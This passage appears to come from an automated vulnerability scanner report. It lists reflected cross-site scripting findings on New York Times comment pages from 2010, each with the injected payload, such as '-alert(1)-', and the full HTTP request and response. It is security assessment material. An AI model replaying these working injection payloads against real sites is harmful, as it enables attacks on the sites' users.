u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Vary: Accept-Encoding Content-Length: 1939
var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index ...[SNIP]... bO.plt=9;ebO.ut=gEbUT;ebO.oo=0;ebO.op=escape(ebTokens("ebLoadScript(\"ebPlayScript\",\"http://amch.questionmarket.com/adscgen/sta.php?survey_num=787369&site=1922996&code=4005086&ut_sys=eb\")"));ebO.z=0de13f;alert(1)//59f87800f7c;ebO.pv="_3_0_3";ebBv="_4_1_7";ebO.rpv="_2_5_1";ebO.wv="_3_0_1";var ebIfrm=(""=="1");var ebSrc=ebBigS+"eb"+ebO.tn+""+ebBv+".js";document.write("<scr"+"ipt src="+ebSrc+"> ...[SNIP]...
3.69. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeab0"><a>aee81adada6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentsaeab0"><a>aee81adada6/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 72749
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Anatomy ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsaeab0"><a>aee81adada6/artsbeat.blogs.nytimes.com/yr/mo/day/anatomy-of-a-scene-unstoppable/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5 ...[SNIP]...
3.70. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb87'-alert(1)-'a3eb2ede684 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments9eb87'-alert(1)-'a3eb2ede684/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 72823
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Anatomy ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments9eb87'-alert(1)-'a3eb2ede684'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.71. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d46b"><a>ee5c926c967 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com2d46b"><a>ee5c926c967/2010/11/11/anatomy-of-a-scene-unstoppable/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 33486
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Anatomy ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com2d46b"><a>ee5c926c967/yr/mo/day/anatomy-of-a-scene-unstoppable/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Bottom9,In ...[SNIP]...
3.72. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7aadc"-alert(1)-"9102bf926e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/?7aadc"-alert(1)-"9102bf926e9=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71893
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Anatomy ...[SNIP]... ount = "nytimesglobal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142717"; var s_pagename = "2010/11/11/anatomy-of-a-scene-unstoppable/?7aadc"-alert(1)-"9102bf926e9=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.73. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc14d"><a>43c86213e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentsfc14d"><a>43c86213e2/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 79273
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Ancient ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsfc14d"><a>43c86213e2/artsbeat.blogs.nytimes.com/yr/mo/day/ancient-roman-shrine-restored-reopens-to-public/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpro ...[SNIP]...
3.74. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7731'-alert(1)-'1133d4592f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commentsb7731'-alert(1)-'1133d4592f0/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 79339
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Ancient ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'commentsb7731'-alert(1)-'1133d4592f0'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.75. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 805f0"><a>e8419ae2ec2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com805f0"><a>e8419ae2ec2/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 34100
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Ancient ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com805f0"><a>e8419ae2ec2/yr/mo/day/ancient-roman-shrine-restored-reopens-to-public/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,B ...[SNIP]...
3.76. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bd7f"-alert(1)-"eca8685c5da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/?2bd7f"-alert(1)-"eca8685c5da=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 77290
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Ancient ...[SNIP]... obal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142683"; var s_pagename = "2010/11/11/ancient-roman-shrine-restored-reopens-to-public/?2bd7f"-alert(1)-"eca8685c5da=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.77. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1180"><a>b75e6cb0360 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentsb1180"><a>b75e6cb0360/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71433
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Grants ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsb1180"><a>b75e6cb0360/artsbeat.blogs.nytimes.com/yr/mo/day/grants-awarded-for-preservation-of-new-york-sites/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetp ...[SNIP]...
3.78. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efe6c'-alert(1)-'1c749a99567 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commentsefe6c'-alert(1)-'1c749a99567/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71521
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Grants ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'commentsefe6c'-alert(1)-'1c749a99567'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.79. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d48e"><a>b2e8a2c3648 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com1d48e"><a>b2e8a2c3648/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 34100
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Grants ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com1d48e"><a>b2e8a2c3648/yr/mo/day/grants-awarded-for-preservation-of-new-york-sites/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7 ...[SNIP]...
3.80. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d01a6"-alert(1)-"452e5e6ff60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/?d01a6"-alert(1)-"452e5e6ff60=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70935
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Grants ...[SNIP]... al,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142527"; var s_pagename = "2010/11/11/grants-awarded-for-preservation-of-new-york-sites/?d01a6"-alert(1)-"452e5e6ff60=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.81. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 197c4'-alert(1)-'5a4facb62fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments197c4'-alert(1)-'5a4facb62fc/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 82577
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Met Say ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments197c4'-alert(1)-'5a4facb62fc'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.82. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70326"><a>8e7c289c36b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments70326"><a>8e7c289c36b/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 82559
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Met Say ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments70326"><a>8e7c289c36b/artsbeat.blogs.nytimes.com/yr/mo/day/met-says-levine-is-much-better-after-illness-forces-withdrawal/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo ...[SNIP]...
3.83. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32dbf"><a>d7df2b346ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com32dbf"><a>d7df2b346ed/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
